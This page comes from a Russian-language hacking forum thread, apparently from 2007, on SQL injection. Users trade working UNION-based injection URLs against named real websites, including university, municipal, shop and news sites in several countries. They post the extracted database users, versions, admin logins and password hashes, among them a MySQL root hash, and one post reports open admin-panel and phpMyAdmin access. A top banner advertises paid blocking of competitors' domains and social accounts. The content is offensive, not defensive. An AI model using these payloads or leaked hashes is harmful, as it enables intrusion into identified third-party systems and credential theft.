УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 391 из 1242

391

Опции темы

Поиск в этой теме

Опции просмотра

#3901

29.11.2007, 21:51

.Begemot.

Участник форума

Регистрация: 27.03.2007

Сообщений: 161

Провел на форуме:
1273248

Репутация: 785

Отправить сообщение для .Begemot. с помощью ICQ

Код HTML:

http://lada.cc/image.phtml?id=9999+union+select+0,1,2,3,4,5,6,7,8,9,10,11/*&item=galleries

Код HTML:

http://lada.cc/image.phtml?id=9999+union+select+0,1,2,3,4,concat(USER(),0x3a,VERSION(),0x3a,DATABASE(),0x3a,id,0x3a,login,0x3a,password),6,7,8,9,10,11+from+adm_users/*&item=galleries

Admin
login: BG
password (hash): 7fd6766a2eef757f37d022422fe8aff5

Последний раз редактировалось trumps; 29.11.2007 в 21:57..

edu

#3902

29.11.2007, 22:03

~~Underwit~~

Banned

Регистрация: 06.10.2006

Сообщений: 288

Провел на форуме:
2741921

Репутация: 469

edu

Цитата:

http://lapa.princeton.edu/peopledetail.php?ID=-1+union+select+1,2,3,4,user,password,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38,39+from+mysql.user/*

MySql5 hash
root *74B1C21ACE0C2D6B0678A5E503D2A60E8F9651A3

#3903

29.11.2007, 22:13

Ded MustD!e

Members of Antichat - Level 5

Регистрация: 23.08.2007

Сообщений: 417

Провел на форуме:
14324684

Репутация: 3908

Код:

http://www.minneapolisparks.org/default.asp?PageID=4&parkid=1+or+1=(SELECT+TOP+1+cast(LOGON_ID+as+nvarchar)%2B%27%3A%27%2Bcast(Password+as+nvarchar)+from+users+where+USER_ID=2)--

#3904

29.11.2007, 23:12

ZAMUT

Members of Antichat - Level 5

Регистрация: 24.10.2007

Сообщений: 256

Провел на форуме:
6905523

Репутация: 1174

SHOP.
www.russki-shop.de

Код:

http://www.russki-shop.de/details.php?Id=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+users+--+

4.1.10a-standard-log

столбец пароля

Код:

http://www.russki-shop.de/details.php?Id=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(pwd,0x71),0x71),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+users+--+

Код:

Подбирайте user' а

#3905

30.11.2007, 00:49

Ponchik

Постоянный

Регистрация: 30.08.2005

Сообщений: 730

Провел на форуме:
6828219

Репутация: 2274

Ещё один бажный молдавский магазин

pacnet.md
_http://www.pacnet.md/index.php?page=catalogue&cat_id=4&type_id=-1+UNION+SELECT+1,2,VERSION(),4,5,6,7,8/*
5.0.44-log и этим всё сказано

#3906

30.11.2007, 01:15

Fata1ex

Постоянный

Регистрация: 12.12.2006

Сообщений: 906

Провел на форуме:
4205500

Репутация: 930

PR:4

Код:

http://www.ipoteka.md/ro/law.php?ID=-5+union+select+1,2,3,4,5,6,7,8,9,concat_ws(char(58),user(),version(),database()),11,12,13,14,15,16/*

ipoteka_ipoteka@sr.dualg.com:4.1.19-standard-log:ipoteka_ipoteka

PR:4

Код:

http://www.rabota.md/vacancies/vacancyCategory.php?id=-1+union+select+concat_ws(char(58),user(),version(),database())/*

coruptie@localhost:4.1.21:coruptie_rabota

PR:3

Код:

http://www.aquasystems.md/readarticle.php?id=-34+union+select+1,concat_ws(char(58),user(),version(),database()),3/*

6847@localhost:5.0.27:6847

Код:

http://www.aquasystems.md/readarticle.php?id=-34+union+select+1,table_name,3+from+information_schema.tables+limit+1,1/*

rgb_members

Код:

http://www.aquasystems.md/readarticle.php?id=-34+union+select+1,concat_ws(char(58),name,password),3+from+rgb_members/*

OzzZZ:6055322b3c1cc50cef132211ca57aa75

#3907

30.11.2007, 01:21

Fata1ex

Постоянный

Регистрация: 12.12.2006

Сообщений: 906

Провел на форуме:
4205500

Репутация: 930

Аргументы и Факты (Молдова)

PR:3

Код:

http://www.aif.md/index.php?id=-240+union+select+1,2,concat_ws(char(58),user(),version(),database()),4,5,6,7,8/*

aif@localhost:4.1.14:aif

#3908

30.11.2007, 09:45

fRg

Участник форума

Регистрация: 28.12.2006

Сообщений: 111

Провел на форуме:
500695

Репутация: 524

Отправить сообщение для fRg с помощью ICQ

Италия

consunigo.it

Код:

http://www.consunigo.it/news_dettaglio.php?idn=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),database(),user()),11,12,13,14,15,16/*

4.0.18-standard:consunigo:root@localhost

cai.mo.it

Код:

http://www.cai.mo.it/soggiorno.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

4.0.27-standard-log:Sql58426_1:Sql58426@62.149.140.27

В табе user нашёл поля id_user,user и email
Поле с паролем не нашёл

-------------------------------------------------------------------

Powered By Giaretta Immobiliare a Venezia

Уязвимость в скрипте sezione.php.

Примеры:

Код:

http://www.giaretta.com/sezione.php?lang=1&id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5/*

Код:

http://www.cadeimiracoli.com/sezione.php?lang=1&id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5/*

Код:

http://www.choosevenice.com/sezione.php?lang=1&id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5/*

5.0.27:giaretta:dbuser@localhost

#3909

30.11.2007, 12:24

Iceangel_

Members of Antichat - Level 5

Регистрация: 09.07.2006

Сообщений: 553

Провел на форуме:
7561206

Репутация: 1861

Сайт охотников и рыболовов.

Код:

http://www.ohota-ribalka.com.ua/sthunt_1.htm?id=-14+UNION+SELECT+1,concat(username,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+phpbb_users/*

+ есть открытая админка(без ввода пароля)
+ есть доступ к phpmyadmin
(ссылки запостил в разделе Админки)

Тур Агенство Велес-тур

Код:

http://www.veles-tour.ru/animals.php?animal=-10+union+select+1,2,user()/*

4.0.27-log
velestour
velestour@zvm5.host.ru

#3910

30.11.2007, 16:56

fRg

Участник форума

Регистрация: 28.12.2006

Сообщений: 111

Провел на форуме:
500695

Репутация: 524

Италия

recensito.net

Код:

http://www.recensito.net/sezione.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user())/*

4.1.22-standard-log:Sql81530_4:Sql81530@62.149.130.119

centroeinaudi.it

Код:

http://www.centroeinaudi.it/web/dinamico/sezione.php?id=-1+union+select+1,2,3,4,5,concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(user(),0x71),0x71)),7,8,9,10/*

4.1.15-Debian_1ubuntu5-log:centroeinaudi:centroeinaudi@localhost

cogepiemonte.it

Код:

http://www.cogepiemonte.it/news.php?f=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user())/*

4.0.26-debug:cogepiemonte:cogepiemonte@localhost

нашёл лишь табу news

editoriaragazzi.com

Код:

http://www.editoriaragazzi.com/sezione.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11/*

5.0.45-community-log:Sql137750_5:Sql137750@62.149.140.190

Страница 391 из 1242

391

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход